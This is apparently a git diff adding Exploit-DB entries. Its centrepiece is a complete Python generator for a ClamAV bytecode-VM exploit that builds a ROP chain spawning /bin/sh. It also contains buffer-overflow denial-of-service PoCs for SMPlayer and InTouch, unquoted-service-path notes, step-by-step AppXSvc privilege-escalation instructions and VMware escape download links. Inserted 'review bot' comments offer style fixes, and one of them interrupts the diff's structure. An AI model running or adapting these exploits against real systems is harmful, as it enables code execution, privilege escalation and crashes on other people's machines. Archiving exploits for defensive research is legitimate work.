diff --git a/exploits/hardware/webapps/47663.txt b/exploits/hardware/webapps/47663.txt
index bda1fe705..1357237f3 100644
--- a/exploits/hardware/webapps/47663.txt
+++ b/exploits/hardware/webapps/47663.txt
@@ -6,7 +6,7 @@
 # Software Link: https://www.lexmark.com/en_us.html​
 # Version: 2.27.4.0.39 (Latest Version)​
 # Tested on: Windows Server 2012​
-# CVE : N/A
+# CVE : CVE-2019-16758
 ​
 ​
 Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.​
diff --git a/exploits/linux/local/47687.py b/exploits/linux/local/47687.py
new file mode 100755
index 000000000..dd518ba13
--- /dev/null
+++ b/exploits/linux/local/47687.py
@@ -0,0 +1,657 @@ +#!/usr/bin/python + +''' +Finished : 22/07/2019 +Pu8lished : 31/10/2019 +Versi0n : Current (<= 0.102.0) +Result : Just for fun. + +"Because of my inability to change the world." + +In 2002, ClamAV got introducted as a solution for malwares on UNIX-based systems, built on +a signature-based detection approach, and still undergoes active-development. by that time, +LibClamAV only held 2 binaries, and expanded to 5 at present. + +ClamBC were exceptionally more complex and served as a testing tool for bytecodes, majorly +validating and interpreting the code therein, and the information provided didn't indicate +nor explain the presence of its internal mechanisms. + +The availability of the source-code and the lack of documentation led to the establishment +of this paper, it was certainly not an attempt to escalate privileges, but rather a sought +-after experience, and source of entertainment that grants the thrill of a challenge. + +Due to the considerable amount of time spent in the analysis, the dissection of the engine +was imminent, whilst significantly broadening our perception on its internal structures. +The trial and error process produced valuable information, crashes illuminated latent bugs, +effectively increasing the attack surface, and magnifying the possibility for exploitation. 
+ +> ./exploit.py +> clambc --debug exploit +[SNIP] +$ +''' + +names = ['test1', + 'read', + 'write', + 'seek', + 'setvirusname', + 'debug_print_str', + 'debug_print_uint', + 'disasm_x86', + 'trace_directory', + 'trace_scope', + 'trace_source', + 'trace_op', + 'trace_value', + 'trace_ptr', + 'pe_rawaddr', + 'file_find', + 'file_byteat', + 'malloc', + 'test2', + 'get_pe_section', + 'fill_buffer', + 'extract_new', + 'read_number', + 'hashset_new', + 'hashset_add', + 'hashset_remove', + 'hashset_contains', + 'hashset_done', + 'hashset_empty', + 'buffer_pipe_new', + 'buffer_pipe_new_fromfile', + 'buffer_pipe_read_avail', + 'buffer_pipe_read_get', + 'buffer_pipe_read_stopped', + 'buffer_pipe_write_avail', + 'buffer_pipe_write_get', + 'buffer_pipe_write_stopped', + 'buffer_pipe_done', + 'inflate_init', + 'inflate_process', + 'inflate_done', + 'bytecode_rt_error', + 'jsnorm_init', + 'jsnorm_process', + 'jsnorm_done', + 'ilog2', + 'ipow', + 'iexp', + 'isin', + 'icos', + 'memstr', + 'hex2ui', + 'atoi', + 'debug_print_str_start', + 'debug_print_str_nonl', + 'entropy_buffer', + 'map_new', + 'map_addkey', + 'map_setvalue', + 'map_remove', + 'map_find', + 'map_getvaluesize', + 'map_getvalue', + 'map_done', + 'file_find_limit', + 'engine_functionality_level', + 'engine_dconf_level', + 'engine_scan_options', + 'engine_db_options', + 'extract_set_container', + 'input_switch', + 'get_environment', + 'disable_bytecode_if', + 'disable_jit_if', + 'version_compare', + 'check_platform', + 'pdf_get_obj_num', + 'pdf_get_flags', + 'pdf_set_flags', + 'pdf_lookupobj', + 'pdf_getobjsize', + 'pdf_getobj', + 'pdf_getobjid', + 'pdf_getobjflags', + 'pdf_setobjflags', + 'pdf_get_offset', + 'pdf_get_phase', + 'pdf_get_dumpedobjid', + 'matchicon', + 'running_on_jit', + 'get_file_reliability', + 'json_is_active', + 'json_get_object', + 'json_get_type', + 'json_get_array_length', + 'json_get_array_idx', + 'json_get_string_length', + 'json_get_string', + 'json_get_boolean', + 'json_get_int'] +o = 
names.index('buffer_pipe_new') + 1 +k = names.index('buffer_pipe_write_get') + 1 +l = names.index('debug_print_str') + 1 +m = names.index('malloc') + 1 + +c = 0 +for name in names: + names[c] = name.encode('hex') + c += 1 + +def cc(n): + v = chr(n + 0x60) + + return v + +def cs(s): + t = '' + + for i in xrange(0, len(s), 2): + u = int(s[i], 16) + l = int(s[i + 1], 16) + for i in [u, l]: + if((i >= 0 and i <= 0xf)): + continue + print 'Invalid string.' + exit(0) + + t += cc(l) + cc(u) + + return t + +def wn(n, fixed=0, size=0): + if n is 0: + return cc(0) + + t = '' + c = hex(n)[2:] + l = len(c) + if (l % 2) is 1: + c = "0" + c + r = c[::-1] + + if(l <= 0x10): + if not fixed: + t = cc(l) + i = 0 + while i < l: + t += cc(int(r[i], 16)) + i += 1 + else: + print 'Invalid number.' + exit(0) + + if size != 0: + t = t.ljust(size, '`') + + return t + +def ws(s): + t = '|' + e = s[-2:] + if(e != '00'): + print '[+] Adding null-byte at the end of the string..' + s += '00' + + l = (len(s) / 2) + + if (len(s) % 2) is 1: + print 'Invalid string length.' + exit(0) + + t += wn(l) + t += cs(s) + + return t + +def wt(t): + if t < (num_types + 0x45): + v = wn(t) + return v + else: + print 'Invalid type.' + exit(0) + +def initialize_header(minfunc=0, maxfunc=0, num_func=0, linelength=4096): + global flimit, num_types + + if maxfunc is 0: + maxfunc = flimit + + if(minfunc > flimit or maxfunc < flimit): + print 'Invalid minfunc and/or maxfunc.' 
+ exit(0) + + header = "ClamBC" + header += wn(0x07) # formatlevel(6, 7) + header += wn(0x88888888) # timestamp + header += ws("416c69656e") # sigmaker + header += wn(0x00) # targetExclude + header += wn(0x00) # kind + header += wn(minfunc) # minfunc + header += wn(maxfunc) # maxfunc + header += wn(0x00) # maxresource + header += ws("00") # compiler + header += wn(num_types + 5) # num_types + header += wn(num_func) # num_func + header += wn(0x53e5493e9f3d1c30) # magic1 + header += wn(0x2a, 1) # magic2 + header += ':' + header += str(linelength) + header += chr(0x0a)*2 + return header + +def prepare_types(contained, type=1, nume=1): + global num_types + + types = "T" + types += wn(0x45, 1) # start_tid(69) + + for i in range(0, num_types): + types += wn(type[i], 1) # kind + if type[i] in [1, 2, 3]: + # Function, PackedStruct, Struct + types += wn(nume[i]) # numElements + for j in range(0, nume[i]): + types += wt(contained[i][j]) # containedTypes[j] + else: + # Array, Pointer + if type[i] != 5: + types += wn(nume[i]) # numElements + types += wt(contained[i][0]) # containedTypes[0] + + types += chr(0x0a) + return types + +def prepare_apis(calls=1): + global maxapi, names, ids, tids + + if(calls > max_api): + print 'Invalid number of calls.' 
+ exit(0) + + apis = 'E' + apis += wn(max_api) # maxapi + apis += wn(calls) # calls(<= maxapi) + + for i in range(0, calls): + apis += wn(ids[i]) # id + apis += wn(tids[i]) # tid + apis += ws(names[ids[i] - 1]) # name + + apis += chr(0x0a) + return apis + +def prepare_globals(numglobals=1): + global max_globals, type, gval + + globals = 'G' + globals += wn(max_globals) # maxglobals + globals += wn(numglobals) # numglobals + + for i in range(0, numglobals): + globals += wt(type[i]) # type + for j in gval[i]: # subcomponents + n = wn(j) + globals += chr(ord(n[0]) - 0x20) + globals += n[1:] + + globals += cc(0) + globals += chr(0x0a) + return globals + +def prepare_function_header(numi, numbb, numa=1, numl=0): + global allo + + if numa > 0xf: + print 'Invalid number of arguments.' + exit(0) + + fheader = 'A' + fheader += wn(numa, 1) # numArgs + fheader += wt(0x20) # returnType + fheader += 'L' + fheader += wn(numl) # numLocals + + for i in range(0, numa + numl): + fheader += wn(type[i]) # types + fheader += wn(allo[i], 1) # | 0x8000 + + fheader += 'F' + fheader += wn(numi) # numInsts + fheader += wn(numbb) # numBB + fheader += chr(0x0a) + return fheader + + + +flimit = 93 +max_api = 100 +max_globals = 32773 + +num_types = 6 + + +# Header parsing +w = initialize_header(num_func=0x1) +# Types parsing +cont = [[0x8], [0x45], [0x20, 0x20], [0x41, 0x20, 0x20], [0x20, 0x41, 0x20], [0x41, 0x20]] +type = [0x4, 0x5, 0x1, 0x1, 0x1, 0x1] +num = [0x8, 0x1, 0x2, 0x3, 0x3, 0x2] +w += prepare_types(cont, type, num) +# API parsing +ids = [o, k, l, m] +tids = [71, 72, 73, 74] +w += prepare_apis(0x4) +''' +# crash @ id=0 +''' +# Globals parsing +type = [0x45] +gval = [[0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41]] +w += prepare_globals(0x1) +# Function header parsing +type = [0x45, 0x41, 0x40, 0x40, 0x40, 0x40, 0x20] +allo = [ 1, 0, 0, 0, 0, 0, 0] +w += prepare_function_header(35, 0x1, 0x0, 0x7) +# BB parsing +p = 'B' + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x0) +p += wn(0x0) 
+p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += '@d' + +# STORE (0x0068732f6e69622f(L=8) -> ([Var #1])) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += 'Nobbfifnfobcghfh' +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x360) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'C`fcd' + +# LOAD Var #2 = ([Var #1]) +p += wn(0x40) +p += wn(0x2) +p += wn(0x27, 1) +p += wn(0x1) + +# SUB Var #2 -= 0xd260 +p += wn(0x40) +p += wn(0x2) +p += wn(0x2, 1, 2) +p += wn(0x2) +p += 'D`fbmd' + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`ad' + +# LOAD Var #3 = ([Var #1]) +p += wn(0x40) +p += wn(0x3) +p += wn(0x27, 1) +p += wn(0x1) + +# SUB Var #3 -= 0x10 +p += wn(0x40) +p += wn(0x3) +p += wn(0x2, 1, 2) +p += wn(0x3) +p += 'B`ad' + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`cd' + +# LOAD Var #4 = ([Var #1]) +p += wn(0x40) +p += wn(0x4) +p += wn(0x27, 1) +p += wn(0x1) + +# SUB Var #4 -= 0x190 +p += wn(0x40) +p += wn(0x4) +p += wn(0x2, 1, 2) +p += wn(0x4) +p += 'C`iad' + + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x38) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'Bhcd' + +# STORE (Var #3 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x3) +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x48) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'Bhdd' + +# ADD Var #3 += 0x3 +p += wn(0x40) +p += wn(0x3) +p += wn(0x2, 1, 2) +p += wn(0x3) +p += 'Acd' + +# STORE (Var #3 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x3) +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x28) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'Bhbd' + +# ADD Var #5 += Var #2 + 0xcbda +p += wn(0x40) +p += 
wn(0x5) +p += wn(0x1, 1, 2) +p += wn(0x2) +p += 'Djmkld' + +# STORE (Var #5 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x5) +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x20) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`bd' + +# STORE (Var #4 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x4) +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x18) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'Bhad' + +# ADD Var #5 += Var #2 + 0x99dc +p += wn(0x40) +p += wn(0x5) +p += wn(0x1, 1, 2) +p += wn(0x2) +p += 'Dlmiid' + +# STORE (Var #5 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x5) +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`ad' + +# STORE (0x3b -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += 'Bkcd' +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`cd' + +# STORE (0x0 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += '@d' +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x40) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'B`dd' + +# STORE (0x0 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += '@d' +p += wn(0x1) + +# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x8) +p += wn(0x0) +p += wn(0x1) +p += wn(0x24, 1) +p += wn(0x46) +p += wn(0x0) +p += 'Ahd' + +# ADD Var #2 += 0x6d68 +p += wn(0x40) +p += wn(0x2) +p += wn(0x1, 1, 2) +p += wn(0x2) +p += 'Dhfmfd' + +# STORE (Var #2 -> Var #1) +p += wn(0x40) +p += wn(0x0) +p += wn(0x26, 1) +p += wn(0x2) +p += wn(0x1) + +''' +0x99dc : pop rdi ; ret +0xcbda : pop rsi ; ret +0x6d68 : pop rax ; ret + +Var #2 = text_base +Var #3 = syscall (+3: pop rdx; ret) +Var #4 = "/bin/sh\x00" + 
+pop rax; ret; o 0x8 +59 o 0x10 +pop rdi; ret; o 0x18 +sh; address o 0x20 +pop rsi; ret; o 0x28 +0x0 o 0x30 +pop rdx; ret; o 0x38 +0x0 o 0x40 +syscall o 0x48 +''' + +# COPY Var #6 = (0x5a90050f(o`e``ije)) +p += wn(0x20) +p += wn(0x0) +p += wn(0x22, 1) +p += 'Ho`e``ijeh' +p += wn(0x6) + +p += 'T' +p += wn(0x13, 1) +p += wn(0x20) +p += wn(0x6) +p += 'E' + +w += p +f = open("exploit", "w") +f.write(w) +f.close() + +print '[+] Generated payload' + +''' +Mortals represent immorality, clueless, they crush each other in an everlasting +pursuit to climb the ladder of social-status, greed is engraved in their nature, +they're materialistic, and the essence of their lives is money and wealth. +However, such definition is inaccurate as it doesn't apply to the minority. +I have discovered a truly marvelous proof of their existence, which this margin +is too narrow to contain. + +- Alien599, not Fermat. + +Greetings to Alien133, Alien610, Alien6068, Alien814, Alien641. +X +''' \ No newline at end of file diff --git a/exploits/windows/dos/47709.py b/exploits/windows/dos/47709.py new file mode 100755 index 000000000..327026f95 --- /dev/null +++ b/exploits/windows/dos/47709.py @@ -0,0 +1,23 @@ +# Title : SMPlayer 19.5.0 - Denial of Service (PoC) +# Tested on : Windows 7 (64 bit) +# Vulnerable Software: SMPlayer v 19.5.0 +# Exploit Author: Malav Vyas +# Vendor Homepage: https://smplayer.info +# Version : 19.5.0 +# Software Link : https://smplayer.info/en/downloads + +# POC +# run this python file, which will generate attack.m3u file +# .m3u file is used as a playlist +# this python file will generate a .m3u file with 25000 "A" characters. +# Open this file in SMPlayer two times. +# second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack. +# For more details, please refer to video + +f="attack.m3u" + +bof = "A"*25000 + +writeFile = open(f, "w") +writeFile.write(bof) +writeFile.close() \ No newline at end of file 
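Review bot: The `'Invalid string.'` guard in `cs` can never fire — `int(s[i], 16)` on a single character either returns a value in 0..15 or raises `ValueError` before the range check runs, so a malformed hex string dies with a traceback instead of the intended message; wrap the two `int()` calls in `try/except ValueError`, and note that the inner `for i in [u, l]` rebinds the outer loop's `i`. `wn` and `ws` compare integers with `is` (`if n is 0:`, `if (l % 2) is 1:`), which relies on CPython's small-int caching and is a SyntaxWarning on 3.8+; use `==`. `prepare_apis` declares `global maxapi` but the module-level constant it actually reads is `max_api`, so the declaration names a variable that never exists. The generator is Python 2 only (`print` statements, `xrange`, `str.encode('hex')`) while the shebang is the unversioned `#!/usr/bin/python`; `#!/usr/bin/env python2` makes the requirement explicit. Here and in the 47709.py and 47711.py hunks the output file is opened, written and closed by hand; `with open("exploit", "w") as f:` closes it on error paths as well.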
diff --git a/exploits/windows/dos/47711.py b/exploits/windows/dos/47711.py
new file mode 100755
index 000000000..7aea04977
--- /dev/null
+++ b/exploits/windows/dos/47711.py
@@ -0,0 +1,24 @@
+# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)
+# Discovery by: chuyreds
+# Discovery Date: 12019-11-16
+# Vendor Homepage: https://on.wonderware.com/
+# Software Link : https://on.wonderware.com/intouch-machine-edition
+# Tested Version: 8.1 SP1
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+# InTouch Machine Edition 8.1 SP1.py
+
+
+# Steps to Produce the Local Buffer Overflow (SEH Unicode):
+# 1.- Run python code: InTouch_Machine_Edition_8.1.py
+# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
+# 3.- Open ITME v8.1 InTouch Machine Edition
+# 4.- On Graficos slect Atributos
+# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
+#!/usr/bin/env python
+
+
+buffer = "\x41" * 1026
+f = open ("InTouch_Machine_Edition_8.1.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/47710.txt b/exploits/windows/local/47710.txt
new file mode 100644
index 000000000..ec6542b25
--- /dev/null
+++ b/exploits/windows/local/47710.txt
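Review bot: The `#!/usr/bin/env python` line sits after the comment header rather than on line 1, so it is an ordinary comment with no effect and the file will not run through its `100755` mode; move it to the first line of the file. `# Discovery Date: 12019-11-16` carries a stray leading digit — presumably `2019-11-16` was meant. The steps refer to `InTouch_Machine_Edition_8.1.py` while the committed file is `47711.py`; a one-line comment noting the published filename would avoid the mismatch for readers following the steps.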
@@ -0,0 +1,34 @@ +# Exploit Title: Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path +# Discovery by: Luis Martinez +# Discovery Date: 2019-11-24 +# Vendor Homepage: https://www.dell.com/ +# Software Link : https://www.dell.com/support/home/mx/es/mxbsdt1/drivers/driversdetails?driverid=vwpkk +# Tested Version: 1.1.6.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Audio" | findstr /i /v """ + +Waves Audio Services WavesSysSvc C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Auto + +# Service info: + +C:\>sc qc WavesSysSvc +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: WavesSysSvc + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Waves Audio Services + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/47712.txt b/exploits/windows/local/47712.txt new file mode 100644 index 000000000..92283bc71 --- /dev/null +++ b/exploits/windows/local/47712.txt 
@@ -0,0 +1,36 @@ +# Exploit Title: Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path +# Date: 2019-11-22 +# Exploit Author: Rene Cortes S +# Vendor Homepage: https://easy-hide-ip.com +# Software Link: https://easy-hide-ip.com +# Version: 5.0.0.3 +# Tested on: Windows 7 Professional Service Pack 1 + +########################################################################################################################## + +Step to discover the unquoted Service: + +C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ + +EasyRedirect EasyRedirect C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe Auto + + +############################################################################################################################################## + +Service info: + +C:\Users\user>sc qc EasyRedirect +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: EasyRedirect + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : EasyRedirect + DEPENDENCIAS : RPCSS + NOMBRE_INICIO_SERVICIO: LocalSystem + +######################################################################################################################### \ No newline at end of file diff --git a/exploits/windows/local/47713.txt b/exploits/windows/local/47713.txt new file mode 100644 index 000000000..58c5fc98b --- /dev/null +++ b/exploits/windows/local/47713.txt 
@@ -0,0 +1,59 @@ +# Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation +# Date: 2019-11-22 +# Exploit Author: Abdelhamid Naceri +# Vendor Homepage: www.microsoft.com +# Tested on: Windows 10 1903 +# CVE : CVE-2019-1385 + + +Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability + +Class: Local Elevation of Privileges + +Description: +This Poc is exploiting a vulnerability in (AppXSvc) , abusing this vulnerability +could allow an attacker to overwrite\create file as SYSTEM which can result in EOP . +The're is 2 way to abuse the issue . +Step To Reproduce : +[1] For An Arbitrary File Creation +1-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a Junction To +your target directory example "c:\" +2-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe +3-Check the directory the file should be created now +4-Enjoy:) +[2] To Overwrite File +1-Create a temp dir in %temp%\ +2-Create a hardlink to your target file in the temp created dir +3-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a junction to +your temp created dir +4-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe +5-Check the file again +Limitation : +when 'MicrosoftEdge.exe' is created it would inherit the directory permission which +mean the file wouldnt be writtable in majority of cases but a simple example of +abusement in the directory "c:\" <- the default acl is preventing Athenticated Users +from creating file but not modifying them so if we abused the vulnerability in "c:\" +we will have an arbitrary file created and also writeable from a normal user . 
+also you cant overwrite file that are not writable by SYSTEM , i didnt make a check +in the poc because in if the file is non readable by the current user the check will +return false even if the file is writtable by SYSTEM . NOTE : you can also overwrite +file which you cant even read them . +In the file creation make sure the path is writtable by SYSTEM otherwise the poc will +fail . I think 99% of folders are writtable by SYSTEM +Platform: +This has been tested on a fully patched system (latest patch -> November 2019) : +OS Edition: Microsoft Windows 10 Home +Os Version: 1903 +OS Version Info: 18362.418 + +Additional Info +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuldLabEx = 18362.1.amd64fre.19h1_release.190318-1202 + + +Expected result: +The Deployment Process should fail with "ERROR_ACCESS_IS_DENIED" +Observed result : +The Deployment Process is overwritting or creating an arbitrary file as +"LOCAL SYSTEM" + +NOTE : It was patched on 7/11/19 \ No newline at end of file diff --git a/exploits/windows/local/47714.md b/exploits/windows/local/47714.md new file mode 100644 index 000000000..0215f85c9 --- /dev/null +++ b/exploits/windows/local/47714.md 
@@ -0,0 +1,25 @@ +# VMware Escape Exploit + +VMware Escape Exploit before VMware WorkStation 12.5.5 + +Host Target: Win10 x64 + +Compiler: VS2013 + +Test on VMware 12.5.2 build-4638234 + +# Known issues + +* Failing to heap manipulation causes host process crash. +* Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH. + +# FAQ + +* Q: Error in reboot vmware after crashing process. +* A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up. + + +![](https://github.com/unamer/vmware_escape/raw/master/cve-2017-4901/exp.gif) + + +EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47714.zip \ No newline at end of file diff --git a/exploits/windows/local/47715.md b/exploits/windows/local/47715.md new file mode 100644 index 000000000..1afee3ba9 --- /dev/null +++ b/exploits/windows/local/47715.md 
@@ -0,0 +1,28 @@ +# VMware Escape Exploit + +VMware Escape Exploit before VMware WorkStation 12.5.3 + +Host Target: Win10 x64 + +Compiler: VS2013 + +Test on VMware 12.5.2 build-4638234 + +# Known issues + +* Failing to heap manipulation causes host process crash. (About 50% successful rate ) +* Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH. + +# FAQ + +* Q: Error in reboot vmware after crashing process. +* A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up. + + +![](https://github.com/unamer/vmware_escape/raw/master/CVE-2017-4905_and_uaf/exploit.gif) + +# Reference + +* https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/ + +EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47715.zip \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8a4770cdb..d8d22421f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -6605,6 +6605,8 @@ id,file,description,date,author,type,platform,port
 47693,exploits/linux/dos/47693.txt,"Ubuntu 19.10 - Refcount Underflow and Type Confusion in shiftfs",2019-11-20,"Google Security Research",dos,linux,
 47694,exploits/ios/dos/47694.txt,"iOS 12.4 - Sandbox Escape due to Integer Overflow in mediaserverd",2019-11-20,"Google Security Research",dos,ios,
 47707,exploits/windows/dos/47707.txt,"Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback",2019-11-22,"Google Security Research",dos,windows,
+47709,exploits/windows/dos/47709.py,"SMPlayer 19.5.0 - Denial of Service (PoC)",2019-11-25,"Malav Vyas",dos,windows,
+47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10793,6 +10795,7 @@ id,file,description,date,author,type,platform,port
 47676,exploits/windows/local/47676.txt,"Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path",2019-11-19,"Luis Martínez",local,windows,
 47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows,
 47685,exploits/windows_x86-64/local/47685.txt,"DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable'",2019-11-03,Mumbai,local,windows_x86-64,
+47687,exploits/linux/local/47687.py,"ClamAV < 0.102.0 - 'bytecode_vm' Code Execution",2019-11-02,anonymous,local,linux,
 47695,exploits/windows/local/47695.rb,"Windows - Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit)",2019-11-20,Metasploit,local,windows,
 47696,exploits/windows/local/47696.rb,"Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit)",2019-11-20,Metasploit,local,windows,
 47701,exploits/unix/local/47701.rb,"Xorg X11 Server - Local Privilege Escalation (Metasploit)",2019-11-20,Metasploit,local,unix,
@@ -10800,6 +10803,11 @@ id,file,description,date,author,type,platform,port
 47705,exploits/windows/local/47705.txt,"ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path",2019-11-22,ZwX,local,windows,
 47706,exploits/windows/local/47706.txt,"LiteManager 4.5.0 - Insecure File Permissions",2019-11-22,ZwX,local,windows,
 47708,exploits/macos/local/47708.txt,"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache",2019-11-22,"Google Security Research",local,macos,
+47710,exploits/windows/local/47710.txt,"Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path",2019-11-25,"Luis Martínez",local,windows,
+47712,exploits/windows/local/47712.txt,"Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path",2019-11-25,"Rene Cortes S",local,windows,
+47713,exploits/windows/local/47713.txt,"Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation",2019-11-25,"Abdelhamid Naceri",local,windows,
+47714,exploits/windows/local/47714.md,"VMware WorkStation 12.5.5 - Virtual Machine Escape",2017-08-08,unamer,local,windows,
